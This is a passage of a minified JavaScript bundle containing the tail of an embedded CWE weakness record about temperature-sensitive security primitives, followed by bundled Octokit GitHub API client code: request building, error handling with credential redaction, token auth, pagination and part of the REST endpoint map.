attacker."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":[{"attr":{"@_Class":"Embedded","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Microcomputer","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Authentication"],"Impact":["Varies by Context","Unexpected State"],"Likelihood":"Low","Note":"Consequences of this weakness are highly contextual."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"The system should account for security primitive behavior when cooled outside standard temperatures."}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1181"}},{"attr":{"@_External_Reference_ID":"REF-1182"}},{"attr":{"@_External_Reference_ID":"REF-1183"}}]},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-10-23"}}}}');function jq(t,a,e,i,n,r,c){try{var d=t[r](c),T=d.value}catch(k){return void e(k)}d.done?a(T):Promise.resolve(T).then(i,n)}function f2(t){return function(){var a=this,e=arguments;return new Promise(function(i,n){var r=t.apply(a,e);function c(T){jq(r,i,n,c,d,"next",T)}function d(T){jq(r,i,n,c,d,"throw",T)}c(void 0)})}}var jb=de(5486);function mT(){return"object"==typeof navigator&&"userAgent"in navigator?navigator.userAgent:"object"==typeof jb&&"version"in jb?`Node.js/${jb.version.substr(1)} (${jb.platform}; ${jb.arch})`:"<environment undetectable>"}var vxe=de(2685);function Qq(t){return"[object Object]"===Object.prototype.toString.call(t)}function $q(t){var a,e;return!1!==Qq(t)&&(void 0===(a=t.constructor)||!(!1===Qq(e=a.prototype)||!1===e.hasOwnProperty("isPrototypeOf")))}function Kq(t,a){const e=Object.assign({},t);return Object.keys(a).forEach(i=>{$q(a[i])?i in t?e[i]=Kq(t[i],a[i]):Object.assign(e,{[i]:a[i]}):Object.assign(e,{[i]:a[i]})}),e}function Xq(t){for(const a in t)void 0===t[a]&&delete t[a];return t}function r5(t,a,e){if("string"==typeof a){let[n,r]=a.split(" ");e=Object.assign(r?{method:n,url:r}:{url:n},e)}else e=Object.assign({},a);e.headers=function Axe(t){return t?Object.keys(t).reduce((a,e)=>(a[e.toLowerCase()]=t[e],a),{}):{}}(e.headers),Xq(e),Xq(e.headers);const i=Kq(t||{},e);return t&&t.mediaType.previews.length&&(i.mediaType.previews=t.mediaType.previews.filter(n=>!i.mediaType.previews.includes(n)).concat(i.mediaType.previews)),i.mediaType.previews=i.mediaType.previews.map(n=>n.replace(/-preview/,"")),i}const Exe=/\{[^}]+\}/g;function Dxe(t){return t.replace(/^\W+|\W+$/g,"").split(/,/)}function Yq(t,a){return Object.keys(t).filter(e=>!a.includes(e)).reduce((e,i)=>(e[i]=t[i],e),{})}function Jq(t){return t.split(/(%[0-9A-Fa-f]{2})/g).map(function(a){return/%[0-9A-Fa-f]/.test(a)||(a=encodeURI(a).replace(/%5B/g,"[").replace(/%5D/g,"]")),a}).join("")}function p2(t){return encodeURIComponent(t).replace(/[!'()*]/g,function(a){return"%"+a.charCodeAt(0).toString(16).toUpperCase()})}function Qb(t,a,e){return a="+"===t||"#"===t?Jq(a):p2(a),e?p2(e)+"="+a:a}function _2(t){return null!=t}function s5(t){return";"===t||"&"===t||"?"===t}function Rxe(t,a){var e=["+","#",".","/",";","?","&"];return t.replace(/\{([^\{\}]+)\}|([^\{\}]+)/g,function(i,n,r){if(n){let d="";const T=[];if(-1!==e.indexOf(n.charAt(0))&&(d=n.charAt(0),n=n.substr(1)),n.split(/,/g).forEach(function(k){var q=/([^:\*]*)(?::(\d+)|(\*))?/.exec(k);T.push(function wxe(t,a,e,i){var n=t[e],r=[];if(_2(n)&&""!==n)if("string"==typeof n||"number"==typeof n||"boolean"==typeof n)n=n.toString(),i&&"*"!==i&&(n=n.substring(0,parseInt(i,10))),r.push(Qb(a,n,s5(a)?e:""));else if("*"===i)Array.isArray(n)?n.filter(_2).forEach(function(c){r.push(Qb(a,c,s5(a)?e:""))}):Object.keys(n).forEach(function(c){_2(n[c])&&r.push(Qb(a,n[c],c))});else{const c=[];Array.isArray(n)?n.filter(_2).forEach(function(d){c.push(Qb(a,d))}):Object.keys(n).forEach(function(d){_2(n[d])&&(c.push(p2(d)),c.push(Qb(a,n[d].toString())))}),s5(a)?r.push(p2(e)+"="+c.join(",")):0!==c.length&&r.push(c.join(","))}else";"===a?_2(n)&&r.push(p2(e)):""!==n||"&"!==a&&"?"!==a?""===n&&r.push(""):r.push(p2(e)+"=");return r}(a,d,q[1],q[2]||q[3]))}),d&&"+"!==d){var c=",";return"?"===d?c="&":"#"!==d&&(c=d),(0!==T.length?d:"")+T.join(c)}return T.join(",")}return Jq(r)})}function Zq(t){let n,a=t.method.toUpperCase(),e=(t.url||"/").replace(/:([a-z]\w+)/g,"{$1}"),i=Object.assign({},t.headers),r=Yq(t,["method","baseUrl","url","headers","request","mediaType"]);const c=function xxe(t){const a=t.match(Exe);return a?a.map(Dxe).reduce((e,i)=>e.concat(i),[]):[]}(e);e=function Ixe(t){return{expand:Rxe.bind(null,t)}}(e).expand(r),/^http/.test(e)||(e=t.baseUrl+e);const T=Yq(r,Object.keys(t).filter(q=>c.includes(q)).concat("baseUrl"));if(!/application\/octet-stream/i.test(i.accept)&&(t.mediaType.format&&(i.accept=i.accept.split(/,/).map(q=>q.replace(/application\/vnd(\.\w+)(\.v3)?(\.\w+)?(\+json)?$/,`application/vnd$1$2.${t.mediaType.format}`)).join(",")),t.mediaType.previews.length)){const q=i.accept.match(/[\w-]+(?=-preview)/g)||[];i.accept=q.concat(t.mediaType.previews).map(Y=>`application/vnd.github.${Y}-preview${t.mediaType.format?`.${t.mediaType.format}`:"+json"}`).join(",")}return["GET","HEAD"].includes(a)?e=function Txe(t,a){const e=/\?/.test(t)?"&":"?",i=Object.keys(a);return 0===i.length?t:t+e+i.map(n=>"q"===n?"q="+a.q.split("+").map(encodeURIComponent).join("+"):`${n}=${encodeURIComponent(a[n])}`).join("&")}(e,T):"data"in T?n=T.data:Object.keys(T).length&&(n=T),!i["content-type"]&&void 0!==n&&(i["content-type"]="application/json; charset=utf-8"),["PATCH","PUT"].includes(a)&&void 0===n&&(n=""),Object.assign({method:a,url:e,headers:i},void 0!==n?{body:n}:null,t.request?{request:t.request}:null)}function Sxe(t,a,e){return Zq(r5(t,a,e))}const Pxe=function eG(t,a){const e=r5(t,a),i=Sxe.bind(null,e);return Object.assign(i,{DEFAULTS:e,defaults:eG.bind(null,e),merge:r5.bind(null,e),parse:Zq})}(null,{method:"GET",baseUrl:"https://api.github.com",headers:{accept:"application/vnd.github.v3+json","user-agent":`octokit-endpoint.js/7.0.5 ${mT()}`},mediaType:{format:"",previews:[]}});var Oxe=de(8225),Nxe=de.n(Oxe);class tG extends Error{constructor(a){super(a),Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor),this.name="Deprecation"}}var Lxe=de(9885),iG=de.n(Lxe);const zxe=iG()(t=>console.warn(t)),Wxe=iG()(t=>console.warn(t));class $b extends Error{constructor(a,e,i){let n;super(a),Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor),this.name="HttpError",this.status=e,"headers"in i&&void 0!==i.headers&&(n=i.headers),"response"in i&&(this.response=i.response,n=i.response.headers);const r=Object.assign({},i.request);i.request.headers.authorization&&(r.headers=Object.assign({},i.request.headers,{authorization:i.request.headers.authorization.replace(/ .*$/," [REDACTED]")})),r.url=r.url.replace(/\bclient_secret=\w+/g,"client_secret=[REDACTED]").replace(/\baccess_token=\w+/g,"access_token=[REDACTED]"),this.request=r,Object.defineProperty(this,"code",{get:()=>(zxe(new tG("[@octokit/request-error] `error.code` is deprecated, use `error.status`.")),e)}),Object.defineProperty(this,"headers",{get:()=>(Wxe(new tG("[@octokit/request-error] `error.headers` is deprecated, use `error.response.headers`.")),n||{})})}}function Vxe(t){return t.arrayBuffer()}function aG(t){const a=t.request&&t.request.log?t.request.log:console;($q(t.body)||Array.isArray(t.body))&&(t.body=JSON.stringify(t.body));let i,n,e={};return(t.request&&t.request.fetch||globalThis.fetch||Nxe())(t.url,Object.assign(ZT({method:t.method,body:t.body,headers:t.headers,redirect:t.redirect},t.body&&{duplex:"half"}),t.request)).then(function(){var c=f2(function*(d){n=d.url,i=d.status;for(const T of d.headers)e[T[0]]=T[1];if("deprecation"in e){const T=e.link&&e.link.match(/<([^>]+)>; rel="deprecation"/),k=T&&T.pop();a.warn(`[@octokit/request] "${t.method} ${t.url}" is deprecated. It is scheduled to be removed on ${e.sunset}${k?`. See ${k}`:""}`)}if(204!==i&&205!==i){if("HEAD"===t.method){if(i<400)return;throw new $b(d.statusText,i,{response:{url:n,status:i,headers:e,data:void 0},request:t})}if(304===i)throw new $b("Not modified",i,{response:{url:n,status:i,headers:e,data:yield c5(d)},request:t});if(i>=400){const T=yield c5(d);throw new $b(function Bxe(t){return"string"==typeof t?t:"message"in t?Array.isArray(t.errors)?`${t.message}: ${t.errors.map(JSON.stringify).join(", ")}`:t.message:`Unknown error: ${JSON.stringify(t)}`}(T),i,{response:{url:n,status:i,headers:e,data:T},request:t})}return c5(d)}});return function(d){return c.apply(this,arguments)}}()).then(c=>({status:i,url:n,headers:e,data:c})).catch(c=>{throw c instanceof $b||"AbortError"===c.name?c:new $b(c.message,500,{request:t})})}function c5(t){return l5.apply(this,arguments)}function l5(){return(l5=f2(function*(t){const a=t.headers.get("content-type");return/application\/json/.test(a)?t.json():!a||/^text\/|charset=utf-8$/.test(a)?t.text():Vxe(t)})).apply(this,arguments)}var m5=function d5(t,a){const e=t.defaults(a);return Object.assign(function(n,r){const c=e.merge(n,r);if(!c.request||!c.request.hook)return aG(e.parse(c));const d=(T,k)=>aG(e.parse(e.merge(T,k)));return Object.assign(d,{endpoint:e,defaults:d5.bind(null,e)}),c.request.hook(d,c)},{endpoint:e,defaults:d5.bind(null,e)})}(Pxe,{headers:{"user-agent":`octokit-request.js/6.2.5 ${mT()}`}}),qxe=class extends Error{constructor(t,a,e){super(function Uxe(t){return"Request failed due to following response errors:\n"+t.errors.map(a=>` - ${a.message}`).join("\n")}(e)),this.request=t,this.headers=a,this.response=e,this.name="GraphqlResponseError",this.errors=e.errors,this.data=e.data,Error.captureStackTrace&&Error.captureStackTrace(this,this.constructor)}},Gxe=["method","baseUrl","url","headers","request","query","mediaType"],jxe=["query","method","url"],nG=/\/api\/v3\/?$/;function u5(t,a){const e=t.defaults(a);return Object.assign((n,r)=>function Qxe(t,a,e){if(e){if("string"==typeof a&&"query"in e)return Promise.reject(new Error('[@octokit/graphql] "query" cannot be used as variable name'));for(const c in e)if(jxe.includes(c))return Promise.reject(new Error(`[@octokit/graphql] "${c}" cannot be used as variable name`))}const i="string"==typeof a?Object.assign({query:a},e):a,n=Object.keys(i).reduce((c,d)=>Gxe.includes(d)?(c[d]=i[d],c):(c.variables||(c.variables={}),c.variables[d]=i[d],c),{}),r=i.baseUrl||t.endpoint.DEFAULTS.baseUrl;return nG.test(r)&&(n.url=r.replace(nG,"/api/graphql")),t(n).then(c=>{if(c.data.errors){const d={};for(const T of Object.keys(c.headers))d[T]=c.headers[T];throw new qxe(n,d,c.data)}return c.data.data})}(e,n,r),{defaults:u5.bind(null,e),endpoint:e.endpoint})}u5(m5,{headers:{"user-agent":`octokit-graphql.js/5.0.6 ${mT()}`},method:"POST",url:"/graphql"});const Kxe=/^v1\./,Xxe=/^ghs_/,Yxe=/^ghu_/;function Jxe(t){return h5.apply(this,arguments)}function h5(){return(h5=f2(function*(t){const a=3===t.split(/\./).length,e=Kxe.test(t)||Xxe.test(t),i=Yxe.test(t);return{type:"token",token:t,tokenType:a?"app":e?"installation":i?"user-to-server":"oauth"}})).apply(this,arguments)}function Zxe(t){return 3===t.split(/\./).length?`bearer ${t}`:`token ${t}`}function ewe(t,a,e,i){return f5.apply(this,arguments)}function f5(){return(f5=f2(function*(t,a,e,i){const n=a.endpoint.merge(e,i);return n.headers.authorization=Zxe(t),a(n)})).apply(this,arguments)}const twe=function(a){if(!a)throw new Error("[@octokit/auth-token] No token passed to createTokenAuth");if("string"!=typeof a)throw new Error("[@octokit/auth-token] Token passed to createTokenAuth is not a string");return a=a.replace(/^(token|bearer) +/i,""),Object.assign(Jxe.bind(null,a),{hook:ewe.bind(null,a)})};var p5=class{static defaults(t){return class extends(this){constructor(...e){const i=e[0]||{};super("function"!=typeof t?Object.assign({},t,i,i.userAgent&&t.userAgent?{userAgent:`${i.userAgent} ${t.userAgent}`}:null):t(i))}}}static plugin(...t){var a;const e=this.plugins;return(a=class extends(this){}).plugins=e.concat(t.filter(n=>!e.includes(n))),a}constructor(t={}){const a=new vxe.Collection,e={baseUrl:m5.endpoint.DEFAULTS.baseUrl,headers:{},request:Object.assign({},t.request,{hook:a.bind(null,"request")}),mediaType:{previews:[],format:""}};if(e.headers["user-agent"]=[t.userAgent,`octokit-core.js/4.2.1 ${mT()}`].filter(Boolean).join(" "),t.baseUrl&&(e.baseUrl=t.baseUrl),t.previews&&(e.mediaType.previews=t.previews),t.timeZone&&(e.headers["time-zone"]=t.timeZone),this.request=m5.defaults(e),this.graphql=function $xe(t){return u5(t,{method:"POST",url:"/graphql"})}(this.request).defaults(e),this.log=Object.assign({debug:()=>{},info:()=>{},warn:console.warn.bind(console),error:console.error.bind(console)},t.log),this.hook=a,t.authStrategy){const n=t,{authStrategy:r}=n,c=JZ(n,["authStrategy"]),d=r(Object.assign({request:this.request,log:this.log,octokit:this,octokitOptions:c},t.auth));a.wrap("request",d.hook),this.auth=d}else if(t.auth){const r=twe(t.auth);a.wrap("request",r.hook),this.auth=r}else this.auth=f2(function*(){return{type:"unauthenticated"}});this.constructor.plugins.forEach(r=>{Object.assign(this,r(this,t))})}};function rG(t){t.hook.wrap("request",(a,e)=>{t.log.debug("request",e);const i=Date.now(),n=t.request.endpoint.parse(e),r=n.url.replace(e.baseUrl,"");return a(e).then(c=>(t.log.info(`${n.method} ${r} - ${c.status} in ${Date.now()-i}ms`),c)).catch(c=>{throw t.log.info(`${n.method} ${r} - ${c.status} in ${Date.now()-i}ms`),c})})}function _5(t,a,e){const i="function"==typeof a?a.endpoint(e):t.request.endpoint(a,e),n="function"==typeof a?a:t.request,r=i.method,c=i.headers;let d=i.url;return{[Symbol.asyncIterator]:()=>({next:()=>f2(function*(){if(!d)return{done:!0};try{const k=function nwe(t){if(!t.data)return L7(ZT({},t),{data:[]});if(!("total_count"in t.data)||"url"in t.data)return t;const e=t.data.incomplete_results,i=t.data.repository_selection,n=t.data.total_count;delete t.data.incomplete_results,delete t.data.repository_selection,delete t.data.total_count;const r=Object.keys(t.data)[0];return t.data=t.data[r],void 0!==e&&(t.data.incomplete_results=e),void 0!==i&&(t.data.repository_selection=i),t.data.total_count=n,t}(yield n({method:r,url:d,headers:c}));return d=((k.headers.link||"").match(/<([^>]+)>;\s*rel="next"/)||[])[1],{value:k}}catch(T){if(409!==T.status)throw T;return d="",{value:{status:200,headers:{},data:[]}}}})()})}}function sG(t,a,e,i){return"function"==typeof e&&(i=e,e=void 0),cG(t,[],_5(t,a,e)[Symbol.asyncIterator](),i)}function cG(t,a,e,i){return e.next().then(n=>{if(n.done)return a;let r=!1;return a=a.concat(i?i(n.value,function c(){r=!0}):n.value.data),r?a:cG(t,a,e,i)})}function lG(t){return{paginate:Object.assign(sG.bind(null,t),{iterator:_5.bind(null,t)})}}p5.VERSION="4.2.1",p5.plugins=[],rG.VERSION="1.0.4",Object.assign(sG,{iterator:_5}),lG.VERSION="5.0.1";const dG={actions:{addCustomLabelsToSelfHostedRunnerForOrg:["POST /orgs/{org}/actions/runners/{runner_id}/labels"],addCustomLabelsToSelfHostedRunnerForRepo:["POST /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],addSelectedRepoToOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}/repositories/{repository_id}"],approveWorkflowRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/approve"],cancelWorkflowRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/cancel"],createOrUpdateEnvironmentSecret:["PUT /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],createOrUpdateOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}"],createOrUpdateRepoSecret:["PUT /repos/{owner}/{repo}/actions/secrets/{secret_name}"],createRegistrationTokenForOrg:["POST /orgs/{org}/actions/runners/registration-token"],createRegistrationTokenForRepo:["POST /repos/{owner}/{repo}/actions/runners/registration-token"],createRemoveTokenForOrg:["POST /orgs/{org}/actions/runners/remove-token"],createRemoveTokenForRepo:["POST /repos/{owner}/{repo}/actions/runners/remove-token"],createWorkflowDispatch:["POST /repos/{owner}/{repo}/actions/workflows/{workflow_id}/dispatches"],deleteActionsCacheById:["DELETE /repos/{owner}/{repo}/actions/caches/{cache_id}"],deleteActionsCacheByKey:["DELETE /repos/{owner}/{repo}/actions/caches{?key,ref}"],deleteArtifact:["DELETE /repos/{owner}/{repo}/actions/artifacts/{artifact_id}"],deleteEnvironmentSecret:["DELETE /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],deleteOrgSecret:["DELETE /orgs/{org}/actions/secrets/{secret_name}"],deleteRepoSecret:["DELETE /repos/{owner}/{repo}/actions/secrets/{secret_name}"],deleteSelfHostedRunnerFromOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}"],deleteSelfHostedRunnerFromRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}"],deleteWorkflowRun:["DELETE /repos/{owner}/{repo}/actions/runs/{run_id}"],deleteWorkflowRunLogs:["DELETE /repos/{owner}/{repo}/actions/runs/{run_id}/logs"],disableSelectedRepositoryGithubActionsOrganization:["DELETE /orgs/{org}/actions/permissions/repositories/{repository_id}"],disableWorkflow:["PUT /repos/{owner}/{repo}/actions/workflows/{workflow_id}/disable"],downloadArtifact:["GET /repos/{owner}/{repo}/actions/artifacts/{artifact_id}/{archive_format}"],downloadJobLogsForWorkflowRun:["GET /repos/{owner}/{repo}/actions/jobs/{job_id}/logs"],downloadWorkflowRunAttemptLogs:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}/logs"],downloadWorkflowRunLogs:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/logs"],enableSelectedRepositoryGithubActionsOrganization:["PUT /orgs/{org}/actions/permissions/repositories/{repository_id}"],enableWorkflow:["PUT /repos/{owner}/{repo}/actions/workflows/{workflow_id}/enable"],getActionsCacheList:["GET /repos/{owner}/{repo}/actions/caches"],getActionsCacheUsage:["GET /repos/{owner}/{repo}/actions/cache/usage"],getActionsCacheUsageByRepoForOrg:["GET /orgs/{org}/actions/cache/usage-by-repository"],getActionsCacheUsageForEnterprise:["GET /enterprises/{enterprise}/actions/cache/usage"],getActionsCacheUsageForOrg:["GET /orgs/{org}/actions/cache/usage"],getAllowedActionsOrganization:["GET /orgs/{org}/actions/permissions/selected-actions"],getAllowedActionsRepository:["GET /repos/{owner}/{repo}/actions/permissions/selected-actions"],getArtifact:["GET /repos/{owner}/{repo}/actions/artifacts/{artifact_id}"],getEnvironmentPublicKey:["GET /repositories/{repository_id}/environments/{environment_name}/secrets/public-key"],getEnvironmentSecret:["GET /repositories/{repository_id}/environments/{environment_name}/secrets/{secret_name}"],getGithubActionsDefaultWorkflowPermissionsEnterprise:["GET /enterprises/{enterprise}/actions/permissions/workflow"],getGithubActionsDefaultWorkflowPermissionsOrganization:["GET /orgs/{org}/actions/permissions/workflow"],getGithubActionsDefaultWorkflowPermissionsRepository:["GET /repos/{owner}/{repo}/actions/permissions/workflow"],getGithubActionsPermissionsOrganization:["GET /orgs/{org}/actions/permissions"],getGithubActionsPermissionsRepository:["GET /repos/{owner}/{repo}/actions/permissions"],getJobForWorkflowRun:["GET /repos/{owner}/{repo}/actions/jobs/{job_id}"],getOrgPublicKey:["GET /orgs/{org}/actions/secrets/public-key"],getOrgSecret:["GET /orgs/{org}/actions/secrets/{secret_name}"],getPendingDeploymentsForRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/pending_deployments"],getRepoPermissions:["GET /repos/{owner}/{repo}/actions/permissions",{},{renamed:["actions","getGithubActionsPermissionsRepository"]}],getRepoPublicKey:["GET /repos/{owner}/{repo}/actions/secrets/public-key"],getRepoSecret:["GET /repos/{owner}/{repo}/actions/secrets/{secret_name}"],getReviewsForRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/approvals"],getSelfHostedRunnerForOrg:["GET /orgs/{org}/actions/runners/{runner_id}"],getSelfHostedRunnerForRepo:["GET /repos/{owner}/{repo}/actions/runners/{runner_id}"],getWorkflow:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}"],getWorkflowAccessToRepository:["GET /repos/{owner}/{repo}/actions/permissions/access"],getWorkflowRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}"],getWorkflowRunAttempt:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}"],getWorkflowRunUsage:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/timing"],getWorkflowUsage:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}/timing"],listArtifactsForRepo:["GET /repos/{owner}/{repo}/actions/artifacts"],listEnvironmentSecrets:["GET /repositories/{repository_id}/environments/{environment_name}/secrets"],listJobsForWorkflowRun:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/jobs"],listJobsForWorkflowRunAttempt:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/attempts/{attempt_number}/jobs"],listLabelsForSelfHostedRunnerForOrg:["GET /orgs/{org}/actions/runners/{runner_id}/labels"],listLabelsForSelfHostedRunnerForRepo:["GET /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],listOrgSecrets:["GET /orgs/{org}/actions/secrets"],listRepoSecrets:["GET /repos/{owner}/{repo}/actions/secrets"],listRepoWorkflows:["GET /repos/{owner}/{repo}/actions/workflows"],listRunnerApplicationsForOrg:["GET /orgs/{org}/actions/runners/downloads"],listRunnerApplicationsForRepo:["GET /repos/{owner}/{repo}/actions/runners/downloads"],listSelectedReposForOrgSecret:["GET /orgs/{org}/actions/secrets/{secret_name}/repositories"],listSelectedRepositoriesEnabledGithubActionsOrganization:["GET /orgs/{org}/actions/permissions/repositories"],listSelfHostedRunnersForOrg:["GET /orgs/{org}/actions/runners"],listSelfHostedRunnersForRepo:["GET /repos/{owner}/{repo}/actions/runners"],listWorkflowRunArtifacts:["GET /repos/{owner}/{repo}/actions/runs/{run_id}/artifacts"],listWorkflowRuns:["GET /repos/{owner}/{repo}/actions/workflows/{workflow_id}/runs"],listWorkflowRunsForRepo:["GET /repos/{owner}/{repo}/actions/runs"],reRunJobForWorkflowRun:["POST /repos/{owner}/{repo}/actions/jobs/{job_id}/rerun"],reRunWorkflow:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/rerun"],reRunWorkflowFailedJobs:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/rerun-failed-jobs"],removeAllCustomLabelsFromSelfHostedRunnerForOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}/labels"],removeAllCustomLabelsFromSelfHostedRunnerForRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],removeCustomLabelFromSelfHostedRunnerForOrg:["DELETE /orgs/{org}/actions/runners/{runner_id}/labels/{name}"],removeCustomLabelFromSelfHostedRunnerForRepo:["DELETE /repos/{owner}/{repo}/actions/runners/{runner_id}/labels/{name}"],removeSelectedRepoFromOrgSecret:["DELETE /orgs/{org}/actions/secrets/{secret_name}/repositories/{repository_id}"],reviewPendingDeploymentsForRun:["POST /repos/{owner}/{repo}/actions/runs/{run_id}/pending_deployments"],setAllowedActionsOrganization:["PUT /orgs/{org}/actions/permissions/selected-actions"],setAllowedActionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions/selected-actions"],setCustomLabelsForSelfHostedRunnerForOrg:["PUT /orgs/{org}/actions/runners/{runner_id}/labels"],setCustomLabelsForSelfHostedRunnerForRepo:["PUT /repos/{owner}/{repo}/actions/runners/{runner_id}/labels"],setGithubActionsDefaultWorkflowPermissionsEnterprise:["PUT /enterprises/{enterprise}/actions/permissions/workflow"],setGithubActionsDefaultWorkflowPermissionsOrganization:["PUT /orgs/{org}/actions/permissions/workflow"],setGithubActionsDefaultWorkflowPermissionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions/workflow"],setGithubActionsPermissionsOrganization:["PUT /orgs/{org}/actions/permissions"],setGithubActionsPermissionsRepository:["PUT /repos/{owner}/{repo}/actions/permissions"],setSelectedReposForOrgSecret:["PUT /orgs/{org}/actions/secrets/{secret_name}/repositories"],setSelectedRepositoriesEnabledGithubActionsOrganization:["PUT /orgs/{org}/actions/permissions/repositories"],setWorkflowAccessToRepository:["PUT /repos/{owner}/{repo}/actions/permissions/access"]},activity:{checkRepoIsStarredByAuthenticatedUser:["GET /user/starred/{owner}/{repo}"],deleteRepoSubscription:["DELETE /repos/{owner}/{repo}/subscription"],deleteThreadSubscription:["DELETE /notifications/threads/{thread_id}/subscription"],getFeeds:["GET /feeds"],getRepoSubscription:["GET /repos/{owner}/{repo}/subscription"],getThread:["GET /notifications/threads/{thread_id}"],getThreadSubscriptionForAuthenticatedUser:["GET /notifications/threads/{thread_id}/subscription"],listEventsForAuthenticatedUser:["GET /users/{username}/events"],listNotificationsForAuthenticatedUser:["GET /notifications"],listOrgEventsForAuthenticatedUser:["GET /users/{username}/events/orgs/{org}"],listPublicEvents:["GET /events"],listPublicEventsForRepoNetwork:["GET /networks/{owner}/{repo}/events"],listPublicEventsForUser:["GET /users/{username}/events/public"],listPublicOrgEvents:["GET /orgs/{org}/events"],listReceivedEventsForUser:["GET /users/{username}/received_events"],listReceivedPublicEventsForUser:["GET /users/{username}/received_events/public"],listRepoEvents:["GET /repos/{owner}/{repo}/events"],listRepoNotificationsForAuthenticatedUser:["GET /repos/{owner}/{repo}/notifications"],listReposStarredByAuthenticatedUser:["GET /user/starred"],listReposStarredByUser:["GET /users/{username}/starred"],listReposWatchedByUser:["GET /users/{username}/subscriptions"],listStargazersForRepo:["GET /repos/{owner}/{repo}/stargazers"],listWatchedReposForAuthenticatedUser:["GET /user/subscriptions"],listWatchersForRepo:["GET /repos/{owner}/{repo}/subscribers"],markNotificationsAsRead:["PUT /notifications"],markRepoNotificationsAsRead:["PUT /repos/{owner}/{repo}/notifications"],markThreadAsRead:["PATCH /notifications/threads/{thread_id}"],setRepoSubscription:["PUT /repos/{owner}/{repo}/subscription"],setThreadSubscription:["PUT /notifications/threads/{thread_id}/subscription"],starRepoForAuthenticatedUser:["PUT /user/starred/{owner}/{repo}"],unstarRepoForAuthenticatedUser:["DELETE /user/starred/{owner}/{repo}"]},apps:{addRepoToInstallation:["PUT /user/installations/{installation_id}/repositories/{repository_id}",{},{renamed:["apps","addRepoToInstallationForAuthenticatedUser"]}],addRepoToInstallationForAuthenticatedUser:["PUT /user/installations/{installation_id}/repositories/{repository_id}"],checkToken:["POST /applications/{client_id}/token"],createFromManifest:["POST /app-manifests/{code}/conversions"],createInstallationAccessToken:["POST /app/installations/{installation_id}/access_tokens"],deleteAuthorization:["DELETE /applications/{client_id}/grant"],deleteInstallation:["DELETE /app/installations/{installation_id}"],deleteToken:["DELETE /applications/{client_id}/token"],getAuthenticated:["GET /app"],getBySlug:["GET /apps/{app_slug}"],getInstallation:["GET /app/installations/{installation_id}"],getOrgInstallation:["GET /orgs/{org}/installation"],getRepoInstallation:["GET /repos/{owner}/{repo}/installation"],getSubscriptionPlanForAccount:["GET /marketplace_listing/accounts/{account_id}"],getSubscriptionPlanForAccountStubbed:["GET /marketplace_listing/stubbed/accounts/{account_id}"],getUserInstallation:["GET /users/{username}/installation"],getWebhookConfigForApp:["GET /app/hook/config"],getWebhookDelivery:["GET /app/hook/deliveries/{delivery_id}"],listAccountsForPlan:["GET /marketplace_listing/plans/{plan_id}/accounts"],listAccountsForPlanStubbed:["GET /marketplace_listing/stubbed/plans/{plan_id}/accounts"],listInstallationReposForAuthenticatedUser:["GET /user/installations/{installation_id}/repositories"],listInstallations:["GET /app/installations"],listInstallationsForAuthenticatedUser:["GET /user/installations"],listPlans:["GET /marketplace_listing/plans"],listPlansStubbed:["GET /marketplace_listing/stubbed/plans"],listReposAccessibleToInstallation:["GET /installation/repositories"],listSubscriptionsForAuthenticatedUser:["GET /user/marketplace_purchases"],listSubscriptionsForAuthenticatedUserStubbed:["GET /user/marketplace_purchases/stubbed"],listWebhookDeliveries:["GET /app/hook/deliveries"],redeliverWebhookDelivery:["POST /app/hook/deliveries/{delivery_id}/attempts"],removeRepoFromInstallation:["DELETE /user/installations/{installation_id}/repositories/{repository_id}",{},{renamed:["apps","removeRepoFromInstallationForAuthenticatedUser"]}],removeRepoFromInstallationForAuthenticatedUser:["DELETE /user/installations/{installation_id}/repositories/{repository_id}"],resetToken:["PATCH /applications/{client_id}/token"],revokeInstallationAccessToken:["DELETE /installation/token"],scopeToken:["POST /applications/{client_id}/token/scoped"],suspendInstallation:["PUT /app/installations/{installation_id}/suspended"],unsuspendInstallation:["DELETE /app/installations/{installation_id}/suspended"],updateWebhookConfigForApp:["PATCH /app/hook/config"]},billing:{getGithubActionsBillingOrg:["GET 